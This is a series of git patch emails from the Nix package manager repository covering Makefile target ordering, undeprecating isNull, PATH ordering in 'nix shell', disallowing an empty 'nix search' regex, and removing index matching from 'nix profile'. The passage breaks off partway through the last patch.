26d60b837ca84856ceef18627b2354d26f002eb1 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 20 Dec 2023 03:23:49 -0500 Subject: [PATCH 157/654] Move down fallback targets in `Makefile` This ensures `lib.mk` still defines `default` as the first target. This fixes some builds. --- Makefile | 30 ++++++++++++++++++------------ 1 file changed, 18 insertions(+), 12 deletions(-) diff --git a/Makefile b/Makefile index c62216df8..1fdb6e897 100644 --- a/Makefile +++ b/Makefile @@ -32,11 +32,6 @@ makefiles += \ tests/unit/libstore-support/local.mk \ tests/unit/libexpr/local.mk \ tests/unit/libexpr-support/local.mk -else -.PHONY: check -check: - @echo "Unit tests are disabled. Configure without '--disable-unit-tests', or avoid calling 'make check'." - @exit 1 endif ifeq ($(ENABLE_FUNCTIONAL_TESTS), yes) @@ -46,11 +41,6 @@ makefiles += \ tests/functional/dyn-drv/local.mk \ tests/functional/test-libstoreconsumer/local.mk \ tests/functional/plugins/local.mk -else -.PHONY: installcheck -installcheck: - @echo "Functional tests are disabled. Configure without '--disable-functional-tests', or avoid calling 'make installcheck'." - @exit 1 endif OPTIMIZE = 1 @@ -64,9 +54,25 @@ endif include mk/lib.mk +# Must be included after `mk/lib.mk` so isn't the default target. +ifneq ($(ENABLE_UNIT_TESTS), yes) +.PHONY: check +check: + @echo "Unit tests are disabled. Configure without '--disable-unit-tests', or avoid calling 'make check'." + @exit 1 +endif + +ifneq ($(ENABLE_FUNCTIONAL_TESTS), yes) +.PHONY: installcheck +installcheck: + @echo "Functional tests are disabled. Configure without '--disable-functional-tests', or avoid calling 'make installcheck'." + @exit 1 +endif + # Must be included after `mk/lib.mk` so rules refer to variables defined # by the library. Rules are not "lazy" like variables, unfortunately. -ifeq ($(ENABLE_DOC_GEN),yes) + +ifeq ($(ENABLE_DOC_GEN), yes) $(eval $(call include-sub-makefile, doc/manual/local.mk)) else .PHONY: manual-html manpages @@ -75,7 +81,7 @@ manual-html manpages: @exit 1 endif -ifeq ($(ENABLE_INTERNAL_API_DOCS),yes) +ifeq ($(ENABLE_INTERNAL_API_DOCS), yes) $(eval $(call include-sub-makefile, doc/internal-api/local.mk)) else .PHONY: internal-api-html From ea454d8687b96376b221d7bdb1085968867c2496 Mon Sep 17 00:00:00 2001 From: Silvan Mosberger Date: Wed, 20 Dec 2023 03:24:38 +0100 Subject: [PATCH 158/654] Undeprecate isNull There's no good reason to deprecate it: - For consistency reasons it should continue to exist, such that all primitive types have a corresponding `builtins.is*` primop. - There's no implementation cost to continuing to have this function - It costs users time to try to migrate away from it, e.g. https://github.com/NixOS/nixpkgs/pull/219747 and https://github.com/NixOS/nixpkgs/pull/275548 - Using it can give easier-to-read code like `all isNull list` Co-authored-by: Robert Hensing --- src/libexpr/primops.cc | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index 8b689f0c8..1ca4a2541 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -438,9 +438,7 @@ static RegisterPrimOp primop_isNull({ .doc = R"( Return `true` if *e* evaluates to `null`, and `false` otherwise. - > **Warning** - > - > This function is *deprecated*; just write `e == null` instead. + This is equivalent to `e == null`. )", .fun = prim_isNull, }); From e94a96893f074a949ba263d66d47e665040fed41 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= <7226587+thufschmitt@users.noreply.github.com> Date: Thu, 21 Dec 2023 10:00:14 +0100 Subject: [PATCH 159/654] =?UTF-8?q?maintainers:=20Mention=20the=20monthly?= =?UTF-8?q?=20=E2=80=9CAssigned=E2=80=9D=20column=20review?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit As decided during [the last team meeting](https://discourse.nixos.org/t/2023-12-18-nix-team-meeting-minutes-113/37050#improving-internal-and-external-communication-3), we want to regularly review the `Assigned` column in the team's board because it tends to turn into a graveyard of forgotten stuff. So encode that in the handbook --- maintainers/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/maintainers/README.md b/maintainers/README.md index ee97c1195..585e2b50a 100644 --- a/maintainers/README.md +++ b/maintainers/README.md @@ -43,7 +43,8 @@ The team meets twice a week: - Discussion meeting: [Fridays 13:00-14:00 CET](https://calendar.google.com/calendar/event?eid=MHNtOGVuNWtrZXNpZHR2bW1sM3QyN2ZjaGNfMjAyMjExMjVUMTIwMDAwWiBiOW81MmZvYnFqYWs4b3E4bGZraGczdDBxZ0Bn) 1. Triage issues and pull requests from the [No Status](#no-status) column (30 min) - 2. Discuss issues and pull requests from the [To discuss](#to-discuss) column (30 min) + 2. Discuss issues and pull requests from the [To discuss](#to-discuss) column (30 min). + Once a month, this slot is used to check the [Assigned](#assigned) column to make sure that nothing bitrots in it. - Work meeting: [Mondays 13:00-15:00 CET](https://calendar.google.com/calendar/event?eid=NTM1MG1wNGJnOGpmOTZhYms3bTB1bnY5cWxfMjAyMjExMjFUMTIwMDAwWiBiOW81MmZvYnFqYWs4b3E4bGZraGczdDBxZ0Bn) From d77a39a314871b9c9a0a4d09b153c40ea9c8aaca Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 21 Dec 2023 16:22:34 +0100 Subject: [PATCH 160/654] Fix indent --- src/libutil/url-name.cc | 45 +++++++++++++++++++++-------------------- src/libutil/url-name.hh | 2 +- 2 files changed, 24 insertions(+), 23 deletions(-) diff --git a/src/libutil/url-name.cc b/src/libutil/url-name.cc index f94383e32..7e51aa2e1 100644 --- a/src/libutil/url-name.cc +++ b/src/libutil/url-name.cc @@ -13,35 +13,36 @@ static const std::regex gitProviderRegex("github|gitlab|sourcehut"); static const std::regex gitSchemeRegex("git($|\\+.*)"); static const std::regex defaultOutputRegex(".*\\.default($|\\^.*)"); -std::optional getNameFromURL(ParsedURL url) { - std::smatch match; +std::optional getNameFromURL(const ParsedURL & url) +{ + std::smatch match; - /* If there is a dir= argument, use its value */ - if (url.query.count("dir") > 0) - return url.query.at("dir"); + /* If there is a dir= argument, use its value */ + if (url.query.count("dir") > 0) + return url.query.at("dir"); - /* If the fragment isn't a "default" and contains two attribute elements, use the last one */ - if (std::regex_match(url.fragment, match, lastAttributeRegex)) - return match.str(1); + /* If the fragment isn't a "default" and contains two attribute elements, use the last one */ + if (std::regex_match(url.fragment, match, lastAttributeRegex)) + return match.str(1); - /* If this is a github/gitlab/sourcehut flake, use the repo name */ - if (std::regex_match(url.scheme, gitProviderRegex) && std::regex_match(url.path, match, secondPathSegmentRegex)) - return match.str(1); + /* If this is a github/gitlab/sourcehut flake, use the repo name */ + if (std::regex_match(url.scheme, gitProviderRegex) && std::regex_match(url.path, match, secondPathSegmentRegex)) + return match.str(1); - /* If it is a regular git flake, use the directory name */ - if (std::regex_match(url.scheme, gitSchemeRegex) && std::regex_match(url.path, match, lastPathSegmentRegex)) - return match.str(1); + /* If it is a regular git flake, use the directory name */ + if (std::regex_match(url.scheme, gitSchemeRegex) && std::regex_match(url.path, match, lastPathSegmentRegex)) + return match.str(1); - /* If everything failed but there is a non-default fragment, use it in full */ - if (!url.fragment.empty() && !std::regex_match(url.fragment, defaultOutputRegex)) - return url.fragment; + /* If everything failed but there is a non-default fragment, use it in full */ + if (!url.fragment.empty() && !std::regex_match(url.fragment, defaultOutputRegex)) + return url.fragment; - /* If there is no fragment, take the last element of the path */ - if (std::regex_match(url.path, match, lastPathSegmentRegex)) - return match.str(1); + /* If there is no fragment, take the last element of the path */ + if (std::regex_match(url.path, match, lastPathSegmentRegex)) + return match.str(1); - /* If even that didn't work, the URL does not contain enough info to determine a useful name */ - return {}; + /* If even that didn't work, the URL does not contain enough info to determine a useful name */ + return {}; } } diff --git a/src/libutil/url-name.hh b/src/libutil/url-name.hh index 188b951e5..6f32754d2 100644 --- a/src/libutil/url-name.hh +++ b/src/libutil/url-name.hh @@ -15,6 +15,6 @@ namespace nix { * flake output, for example because it is empty or "default". * Otherwise returns the extracted name. */ -std::optional getNameFromURL(ParsedURL url); +std::optional getNameFromURL(const ParsedURL & url); } From 14508ade289b884ab2ceb0645a549a69fba82cab Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 21 Dec 2023 16:25:55 +0100 Subject: [PATCH 161/654] Typo --- src/nix/profile.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/nix/profile.cc b/src/nix/profile.cc index 98fa165e8..1d89815e2 100644 --- a/src/nix/profile.cc +++ b/src/nix/profile.cc @@ -119,7 +119,7 @@ struct ProfileManifest if (pathExists(manifestPath)) { auto json = nlohmann::json::parse(readFile(manifestPath)); - /* Keep track of alreay found names to allow preventing duplicates */ + /* Keep track of already found names to allow preventing duplicates. */ std::set foundNames; auto version = json.value("version", 0); From 942d635102810a310c747cee66d9e9f343e6b4c3 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 21 Dec 2023 16:33:53 +0100 Subject: [PATCH 162/654] Fix release notes --- doc/manual/rl-next/nix-profile-names.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/manual/rl-next/nix-profile-names.md b/doc/manual/rl-next/nix-profile-names.md index 2f4a589a7..f5953bd72 100644 --- a/doc/manual/rl-next/nix-profile-names.md +++ b/doc/manual/rl-next/nix-profile-names.md @@ -1,5 +1,5 @@ --- -synopsis: nix profile: Allow referring to elements by human-readable name +synopsis: "`nix profile` now allows referring to elements by human-readable name" prs: 8678 --- From 5ed1884875cc6a6e9330b6c5a2f24c35e685f5a0 Mon Sep 17 00:00:00 2001 From: Cole Helbling Date: Thu, 21 Dec 2023 10:14:54 -0800 Subject: [PATCH 163/654] libcmd: Installable::toStorePaths -> Installable::toStorePathSet --- src/libcmd/installables.cc | 4 ++-- src/libcmd/installables.hh | 2 +- src/nix/develop.cc | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/src/libcmd/installables.cc b/src/libcmd/installables.cc index 6b3c82374..be9ebe9ca 100644 --- a/src/libcmd/installables.cc +++ b/src/libcmd/installables.cc @@ -715,7 +715,7 @@ BuiltPaths Installable::toBuiltPaths( } } -StorePathSet Installable::toStorePaths( +StorePathSet Installable::toStorePathSet( ref evalStore, ref store, Realise mode, OperateOn operateOn, @@ -735,7 +735,7 @@ StorePath Installable::toStorePath( Realise mode, OperateOn operateOn, ref installable) { - auto paths = toStorePaths(evalStore, store, mode, operateOn, {installable}); + auto paths = toStorePathSet(evalStore, store, mode, operateOn, {installable}); if (paths.size() != 1) throw Error("argument '%s' should evaluate to one store path", installable->what()); diff --git a/src/libcmd/installables.hh b/src/libcmd/installables.hh index e087f935c..c8ad41388 100644 --- a/src/libcmd/installables.hh +++ b/src/libcmd/installables.hh @@ -165,7 +165,7 @@ struct Installable const Installables & installables, BuildMode bMode = bmNormal); - static std::set toStorePaths( + static std::set toStorePathSet( ref evalStore, ref store, Realise mode, diff --git a/src/nix/develop.cc b/src/nix/develop.cc index 8db2de491..974020951 100644 --- a/src/nix/develop.cc +++ b/src/nix/develop.cc @@ -376,7 +376,7 @@ struct Common : InstallableCommand, MixProfile for (auto & [installable_, dir_] : redirects) { auto dir = absPath(dir_); auto installable = parseInstallable(store, installable_); - auto builtPaths = Installable::toStorePaths( + auto builtPaths = Installable::toStorePathSet( getEvalStore(), store, Realise::Nothing, OperateOn::Output, {installable}); for (auto & path: builtPaths) { auto from = store->printStorePath(path); @@ -631,7 +631,7 @@ struct CmdDevelop : Common, MixEnvironment bool found = false; - for (auto & path : Installable::toStorePaths(getEvalStore(), store, Realise::Outputs, OperateOn::Output, {bashInstallable})) { + for (auto & path : Installable::toStorePathSet(getEvalStore(), store, Realise::Outputs, OperateOn::Output, {bashInstallable})) { auto s = store->printStorePath(path) + "/bin/bash"; if (pathExists(s)) { shell = s; From 1fb43d1eee6f398686523c0bb80adb987c584c61 Mon Sep 17 00:00:00 2001 From: Cole Helbling Date: Wed, 20 Dec 2023 10:25:22 -0800 Subject: [PATCH 164/654] tests: add a test for command line ordering --- tests/functional/shell-hello.nix | 16 ++++++++++++++++ tests/functional/shell.sh | 8 ++++++++ 2 files changed, 24 insertions(+) diff --git a/tests/functional/shell-hello.nix b/tests/functional/shell-hello.nix index 3fdd3501d..dfe66ef93 100644 --- a/tests/functional/shell-hello.nix +++ b/tests/functional/shell-hello.nix @@ -23,4 +23,20 @@ with import ./config.nix; chmod +x $dev/bin/hello2 ''; }; + + salve-mundi = mkDerivation { + name = "salve-mundi"; + outputs = [ "out" ]; + meta.outputsToInstall = [ "out" ]; + buildCommand = + '' + mkdir -p $out/bin + + cat > $out/bin/hello < Date: Mon, 18 Dec 2023 15:22:09 -0800 Subject: [PATCH 165/654] nix shell: reflect command line order in PATH order Prior to this change, Nix would prepend every installable to the PATH list in order to ensure that installables appeared before the current PATH from the ambient environment. With this change, all the installables are still prepended to the PATH, but in the same order as they appear on the command line. This means that the first of two packages that expose an executable `hello` would appear in the PATH first, and thus be executed first. See the test in the prior commit for a more concrete example. --- src/libcmd/installables.cc | 14 ++++++++++++++ src/libcmd/installables.hh | 7 +++++++ src/nix/run.cc | 9 ++++++--- 3 files changed, 27 insertions(+), 3 deletions(-) diff --git a/src/libcmd/installables.cc b/src/libcmd/installables.cc index be9ebe9ca..736c41a1e 100644 --- a/src/libcmd/installables.cc +++ b/src/libcmd/installables.cc @@ -729,6 +729,20 @@ StorePathSet Installable::toStorePathSet( return outPaths; } +StorePaths Installable::toStorePaths( + ref evalStore, + ref store, + Realise mode, OperateOn operateOn, + const Installables & installables) +{ + StorePaths outPaths; + for (auto & path : toBuiltPaths(evalStore, store, mode, operateOn, installables)) { + auto thisOutPaths = path.outPaths(); + outPaths.insert(outPaths.end(), thisOutPaths.begin(), thisOutPaths.end()); + } + return outPaths; +} + StorePath Installable::toStorePath( ref evalStore, ref store, diff --git a/src/libcmd/installables.hh b/src/libcmd/installables.hh index c8ad41388..95e8841ca 100644 --- a/src/libcmd/installables.hh +++ b/src/libcmd/installables.hh @@ -172,6 +172,13 @@ struct Installable OperateOn operateOn, const Installables & installables); + static std::vector toStorePaths( + ref evalStore, + ref store, + Realise mode, + OperateOn operateOn, + const Installables & installables); + static StorePath toStorePath( ref evalStore, ref store, diff --git a/src/nix/run.cc b/src/nix/run.cc index efc0c56a1..9bca5b9d0 100644 --- a/src/nix/run.cc +++ b/src/nix/run.cc @@ -114,7 +114,7 @@ struct CmdShell : InstallablesCommand, MixEnvironment setEnviron(); - auto unixPath = tokenizeString(getEnv("PATH").value_or(""), ":"); + std::vector pathAdditions; while (!todo.empty()) { auto path = todo.front(); @@ -122,7 +122,7 @@ struct CmdShell : InstallablesCommand, MixEnvironment if (!done.insert(path).second) continue; if (true) - unixPath.push_front(store->printStorePath(path) + "/bin"); + pathAdditions.push_back(store->printStorePath(path) + "/bin"); auto propPath = CanonPath(store->printStorePath(path)) + "nix-support" + "propagated-user-env-packages"; if (auto st = accessor->maybeLstat(propPath); st && st->type == SourceAccessor::tRegular) { @@ -131,7 +131,10 @@ struct CmdShell : InstallablesCommand, MixEnvironment } } - setenv("PATH", concatStringsSep(":", unixPath).c_str(), 1); + auto unixPath = tokenizeString(getEnv("PATH").value_or(""), ":"); + unixPath.insert(unixPath.begin(), pathAdditions.begin(), pathAdditions.end()); + auto unixPathString = concatStringsSep(":", unixPath); + setenv("PATH", unixPathString.c_str(), 1); Strings args; for (auto & arg : command) args.push_back(arg); From 8c4ea12f11511519726737cc39bc5b4e089b9f33 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Thu, 21 Dec 2023 21:03:06 +0100 Subject: [PATCH 166/654] libutil/url-parts.hh: comment --- src/libutil/url-parts.hh | 1 + 1 file changed, 1 insertion(+) diff --git a/src/libutil/url-parts.hh b/src/libutil/url-parts.hh index e968eea4b..a3b4f5b99 100644 --- a/src/libutil/url-parts.hh +++ b/src/libutil/url-parts.hh @@ -25,6 +25,7 @@ const static std::string pathRegex = "(?:" + segmentRegex + "(?:/" + segmentRege /// A Git ref (i.e. branch or tag name). /// \todo check that this is correct. +/// This regex incomplete. See https://git-scm.com/docs/git-check-ref-format const static std::string refRegexS = "[a-zA-Z0-9@][a-zA-Z0-9_.\\/@-+]*"; extern std::regex refRegex; From 397cf4e2859d5723f1e36aeb4b26ecae673515a8 Mon Sep 17 00:00:00 2001 From: Felix Uhl Date: Mon, 27 Nov 2023 23:09:32 +0100 Subject: [PATCH 167/654] nix search: Disallow empty regex Fixes #4739 Fixes #3553 in spirit IMO --- doc/manual/rl-next/empty-search-regex.md | 8 ++++++++ src/nix/search.cc | 6 ++---- src/nix/search.md | 15 ++++++++++----- tests/functional/search.sh | 17 ++++++++++------- 4 files changed, 30 insertions(+), 16 deletions(-) create mode 100644 doc/manual/rl-next/empty-search-regex.md diff --git a/doc/manual/rl-next/empty-search-regex.md b/doc/manual/rl-next/empty-search-regex.md new file mode 100644 index 000000000..b193f9456 --- /dev/null +++ b/doc/manual/rl-next/empty-search-regex.md @@ -0,0 +1,8 @@ +synopsis: Disallow empty search regex in `nix search` +prs: #9481 +description: { + +[`nix search`](@docroot@/command-ref/new-cli/nix3-search.md) now requires a search regex to be passed. To show all packages, use `^`. + +} + diff --git a/src/nix/search.cc b/src/nix/search.cc index ef0139e09..97ef1375e 100644 --- a/src/nix/search.cc +++ b/src/nix/search.cc @@ -67,11 +67,9 @@ struct CmdSearch : InstallableValueCommand, MixJSON settings.readOnlyMode = true; evalSettings.enableImportFromDerivation.setDefault(false); - // Empty search string should match all packages - // Use "^" here instead of ".*" due to differences in resulting highlighting - // (see #1893 -- libc++ claims empty search string is not in POSIX grammar) + // Recommend "^" here instead of ".*" due to differences in resulting highlighting if (res.empty()) - res.push_back("^"); + throw UsageError("Must provide at least one regex! To match all packages, use '%s'.", "nix search ^"); std::vector regexes; std::vector excludeRegexes; diff --git a/src/nix/search.md b/src/nix/search.md index 0c5d22549..f65ac9b17 100644 --- a/src/nix/search.md +++ b/src/nix/search.md @@ -5,7 +5,7 @@ R""( * Show all packages in the `nixpkgs` flake: ```console - # nix search nixpkgs + # nix search nixpkgs ^ * legacyPackages.x86_64-linux.AMB-plugins (0.8.1) A set of ambisonics ladspa plugins @@ -34,7 +34,7 @@ R""( * Show all packages in the flake in the current directory: ```console - # nix search + # nix search . ^ ``` * Search for Firefox or Chromium: @@ -64,11 +64,16 @@ R""( `nix search` searches [*installable*](./nix.md#installables) (which can be evaluated, that is, a flake or Nix expression, but not a store path or store derivation path) for packages whose name or description matches all of the -regular expressions *regex*. For each matching package, It prints the +regular expressions *regex*. For each matching package, It prints the full attribute name (from the root of the [installable](./nix.md#installables)), the version and the `meta.description` field, highlighting the substrings that -were matched by the regular expressions. If no regular expressions are -specified, all packages are shown. +were matched by the regular expressions. + +To show all packages, use the regular expression `^`. In contrast to `.*`, +it avoids highlighting the entire name and description of every package. + +> Note that in this context, `^` is the regex character to match the beginning of a string, *not* the delimiter for +> [selecting a derivation output](@docroot@/command-ref/new-cli/nix.md#derivation-output-selection). # Flake output attributes diff --git a/tests/functional/search.sh b/tests/functional/search.sh index 8742f8736..d9c7a75da 100644 --- a/tests/functional/search.sh +++ b/tests/functional/search.sh @@ -17,12 +17,15 @@ clearCache # Multiple arguments will not exist (( $(nix search -f search.nix '' hello broken | wc -l) == 0 )) +# No regex should return an error +(( $(nix search -f search.nix '' | wc -l) == 0 )) + ## Search expressions # Check that empty search string matches all -nix search -f search.nix '' |grepQuiet foo -nix search -f search.nix '' |grepQuiet bar -nix search -f search.nix '' |grepQuiet hello +nix search -f search.nix '' ^ | grepQuiet foo +nix search -f search.nix '' ^ | grepQuiet bar +nix search -f search.nix '' ^ | grepQuiet hello ## Tests for multiple regex/match highlighting @@ -39,8 +42,8 @@ e=$'\x1b' # grep doesn't support \e, \033 or even \x1b (( $(nix search -f search.nix '' 'b' | grep -Eo "$e\[32;1mb$e\[(0|0;1)m" | wc -l) == 3 )) ## Tests for --exclude -(( $(nix search -f search.nix -e hello | grep -c hello) == 0 )) +(( $(nix search -f search.nix ^ -e hello | grep -c hello) == 0 )) -(( $(nix search -f search.nix foo --exclude 'foo|bar' | grep -Ec 'foo|bar') == 0 )) -(( $(nix search -f search.nix foo -e foo --exclude bar | grep -Ec 'foo|bar') == 0 )) -[[ $(nix search -f search.nix -e bar --json | jq -c 'keys') == '["foo","hello"]' ]] +(( $(nix search -f search.nix foo ^ --exclude 'foo|bar' | grep -Ec 'foo|bar') == 0 )) +(( $(nix search -f search.nix foo ^ -e foo --exclude bar | grep -Ec 'foo|bar') == 0 )) +[[ $(nix search -f search.nix '' ^ -e bar --json | jq -c 'keys') == '["foo","hello"]' ]] From 4f47152209a81a2bef421467ca4bec00023eec04 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Thu, 21 Dec 2023 23:11:25 +0100 Subject: [PATCH 168/654] libutil/url-parts.hh: Fix regex Regex syntax is awful. --- src/libutil/url-parts.hh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libutil/url-parts.hh b/src/libutil/url-parts.hh index a3b4f5b99..4bb37ea9b 100644 --- a/src/libutil/url-parts.hh +++ b/src/libutil/url-parts.hh @@ -26,7 +26,7 @@ const static std::string pathRegex = "(?:" + segmentRegex + "(?:/" + segmentRege /// A Git ref (i.e. branch or tag name). /// \todo check that this is correct. /// This regex incomplete. See https://git-scm.com/docs/git-check-ref-format -const static std::string refRegexS = "[a-zA-Z0-9@][a-zA-Z0-9_.\\/@-+]*"; +const static std::string refRegexS = "[a-zA-Z0-9@][a-zA-Z0-9_.\\/@+-]*"; extern std::regex refRegex; /// Instead of defining what a good Git Ref is, we define what a bad Git Ref is From 26d7b0c793b389b71218fc38e613d3f75ad72299 Mon Sep 17 00:00:00 2001 From: Felix Uhl Date: Thu, 21 Dec 2023 22:45:21 +0100 Subject: [PATCH 169/654] Move url-name utility to libexpr/flake --- src/{libutil => libexpr/flake}/url-name.cc | 0 src/{libutil => libexpr/flake}/url-name.hh | 0 src/nix/profile.cc | 2 +- tests/unit/{libutil => libexpr/flake}/url-name.cc | 2 +- tests/unit/libexpr/local.mk | 3 ++- 5 files changed, 4 insertions(+), 3 deletions(-) rename src/{libutil => libexpr/flake}/url-name.cc (100%) rename src/{libutil => libexpr/flake}/url-name.hh (100%) rename tests/unit/{libutil => libexpr/flake}/url-name.cc (99%) diff --git a/src/libutil/url-name.cc b/src/libexpr/flake/url-name.cc similarity index 100% rename from src/libutil/url-name.cc rename to src/libexpr/flake/url-name.cc diff --git a/src/libutil/url-name.hh b/src/libexpr/flake/url-name.hh similarity index 100% rename from src/libutil/url-name.hh rename to src/libexpr/flake/url-name.hh diff --git a/src/nix/profile.cc b/src/nix/profile.cc index 1d89815e2..abd56e4f4 100644 --- a/src/nix/profile.cc +++ b/src/nix/profile.cc @@ -11,7 +11,7 @@ #include "profiles.hh" #include "names.hh" #include "url.hh" -#include "url-name.hh" +#include "flake/url-name.hh" #include #include diff --git a/tests/unit/libutil/url-name.cc b/tests/unit/libexpr/flake/url-name.cc similarity index 99% rename from tests/unit/libutil/url-name.cc rename to tests/unit/libexpr/flake/url-name.cc index f637efa89..84d32837c 100644 --- a/tests/unit/libutil/url-name.cc +++ b/tests/unit/libexpr/flake/url-name.cc @@ -1,4 +1,4 @@ -#include "url-name.hh" +#include "flake/url-name.hh" #include namespace nix { diff --git a/tests/unit/libexpr/local.mk b/tests/unit/libexpr/local.mk index 5743880d7..25810ad9c 100644 --- a/tests/unit/libexpr/local.mk +++ b/tests/unit/libexpr/local.mk @@ -16,7 +16,8 @@ endif libexpr-tests_SOURCES := \ $(wildcard $(d)/*.cc) \ - $(wildcard $(d)/value/*.cc) + $(wildcard $(d)/value/*.cc) \ + $(wildcard $(d)/flake/*.cc) libexpr-tests_EXTRA_INCLUDES = \ -I tests/unit/libexpr-support \ From 4b4111866358b39d5bfc352fa58040c8a54a2759 Mon Sep 17 00:00:00 2001 From: Felix Uhl Date: Fri, 22 Dec 2023 09:38:13 +0100 Subject: [PATCH 170/654] Move flakeref tests to new flake/ subdirectory --- tests/unit/libexpr/{ => flake}/flakeref.cc | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename tests/unit/libexpr/{ => flake}/flakeref.cc (100%) diff --git a/tests/unit/libexpr/flakeref.cc b/tests/unit/libexpr/flake/flakeref.cc similarity index 100% rename from tests/unit/libexpr/flakeref.cc rename to tests/unit/libexpr/flake/flakeref.cc From 3187bc9ac3dd193b9329ef68c73ac3cca794ed78 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 21 Dec 2023 16:48:29 +0100 Subject: [PATCH 171/654] nix profile: Remove indices --- src/nix/profile-list.md | 2 -- src/nix/profile-remove.md | 7 ------ src/nix/profile-upgrade.md | 7 ------ src/nix/profile.cc | 39 ++++++++++----------------------- tests/functional/nix-profile.sh | 11 +++++----- 5 files changed, 16 insertions(+), 50 deletions(-) diff --git a/src/nix/profile-list.md b/src/nix/profile-list.md index facfdf0d6..9811b9ec9 100644 --- a/src/nix/profile-list.md +++ b/src/nix/profile-list.md @@ -7,14 +7,12 @@ R""( ```console # nix profile list Name: gdb - Index: 0 Flake attribute: legacyPackages.x86_64-linux.gdb Original flake URL: flake:nixpkgs Locked flake URL: github:NixOS/nixpkgs/7b38b03d76ab71bdc8dc325e3f6338d984cc35ca Store paths: /nix/store/indzcw5wvlhx6vwk7k4iq29q15chvr3d-gdb-11.1 Name: blender-bin - Index: 1 Flake attribute: packages.x86_64-linux.default Original flake URL: flake:blender-bin Locked flake URL: github:edolstra/nix-warez/91f2ffee657bf834e4475865ae336e2379282d34?dir=blender diff --git a/src/nix/profile-remove.md b/src/nix/profile-remove.md index c994b79bd..1f6532250 100644 --- a/src/nix/profile-remove.md +++ b/src/nix/profile-remove.md @@ -8,13 +8,6 @@ R""( # nix profile remove hello ``` -* Remove a package by index - *(deprecated, will be removed in a future version)*: - - ```console - # nix profile remove 3 - ``` - * Remove all packages: ```console diff --git a/src/nix/profile-upgrade.md b/src/nix/profile-upgrade.md index 47103edfc..432b8fa94 100644 --- a/src/nix/profile-upgrade.md +++ b/src/nix/profile-upgrade.md @@ -15,13 +15,6 @@ R""( # nix profile upgrade hello ``` -* Upgrade a specific package by index - *(deprecated, will be removed in a future version)*: - - ```console - # nix profile upgrade 0 - ``` - # Description This command upgrades a previously installed package in a Nix profile, diff --git a/src/nix/profile.cc b/src/nix/profile.cc index 1d89815e2..517693cd4 100644 --- a/src/nix/profile.cc +++ b/src/nix/profile.cc @@ -470,40 +470,28 @@ public: std::string pattern; std::regex reg; }; - typedef std::variant Matcher; + typedef std::variant Matcher; std::vector getMatchers(ref store) { std::vector res; - auto anyIndexMatchers = false; - for (auto & s : _matchers) { - if (auto n = string2Int(s)) { - res.push_back(*n); - anyIndexMatchers = true; - } + if (auto n = string2Int(s)) + throw Error("'nix profile' no longer supports indices ('%d')", *n); else if (store->isStorePath(s)) res.push_back(s); else res.push_back(RegexPattern{s,std::regex(s, std::regex::extended | std::regex::icase)}); } - if (anyIndexMatchers) { - warn("Indices are deprecated and will be removed in a future version!\n" - " Refer to packages by their `Name` as printed by `nix profile list`.\n" - " See https://github.com/NixOS/nix/issues/9171 for more information."); - } - return res; } - bool matches(const Store & store, const ProfileElement & element, size_t pos, const std::vector & matchers) + bool matches(const Store & store, const ProfileElement & element, const std::vector & matchers) { for (auto & matcher : matchers) { - if (auto n = std::get_if(&matcher)) { - if (*n == pos) return true; - } else if (auto path = std::get_if(&matcher)) { + if (auto path = std::get_if(&matcher)) { if (element.storePaths.count(store.parseStorePath(*path))) return true; } else if (auto regex = std::get_if(&matcher)) { if (std::regex_match(element.name, regex->reg)) @@ -539,7 +527,7 @@ struct CmdProfileRemove : virtual EvalCommand, MixDefaultProfile, MixProfileElem for (size_t i = 0; i < oldManifest.elements.size(); ++i) { auto & element(oldManifest.elements[i]); - if (!matches(*store, element, i, matchers)) { + if (!matches(*store, element, matchers)) { newManifest.elements.push_back(std::move(element)); } else { notice("removing '%s'", element.identifier()); @@ -553,11 +541,9 @@ struct CmdProfileRemove : virtual EvalCommand, MixDefaultProfile, MixProfileElem if (removedCount == 0) { for (auto matcher: matchers) { - if (const size_t * index = std::get_if(&matcher)){ - warn("'%d' is not a valid index", *index); - } else if (const Path * path = std::get_if(&matcher)){ + if (const Path * path = std::get_if(&matcher)) { warn("'%s' does not match any paths", *path); - } else if (const RegexPattern * regex = std::get_if(&matcher)){ + } else if (const RegexPattern * regex = std::get_if(&matcher)) { warn("'%s' does not match any packages", regex->pattern); } } @@ -595,7 +581,7 @@ struct CmdProfileUpgrade : virtual SourceExprCommand, MixDefaultProfile, MixProf for (size_t i = 0; i < manifest.elements.size(); ++i) { auto & element(manifest.elements[i]); - if (!matches(*store, element, i, matchers)) { + if (!matches(*store, element, matchers)) { continue; } @@ -657,11 +643,9 @@ struct CmdProfileUpgrade : virtual SourceExprCommand, MixDefaultProfile, MixProf if (upgradedCount == 0) { if (matchedCount == 0) { for (auto & matcher : matchers) { - if (const size_t * index = std::get_if(&matcher)){ - warn("'%d' is not a valid index", *index); - } else if (const Path * path = std::get_if(&matcher)){ + if (const Path * path = std::get_if(&matcher)) { warn("'%s' does not match any paths", *path); - } else if (const RegexPattern * regex = std::get_if(&matcher)){ + } else if (const RegexPattern * regex = std::get_if(&matcher)) { warn("'%s' does not match any packages", regex->pattern); } } @@ -715,7 +699,6 @@ struct CmdProfileList : virtual EvalCommand, virtual StoreCommand, MixDefaultPro logger->cout("Name: " ANSI_BOLD "%s" ANSI_NORMAL "%s", element.name, element.active ? "" : " " ANSI_RED "(inactive)" ANSI_NORMAL); - logger->cout("Index: %s", 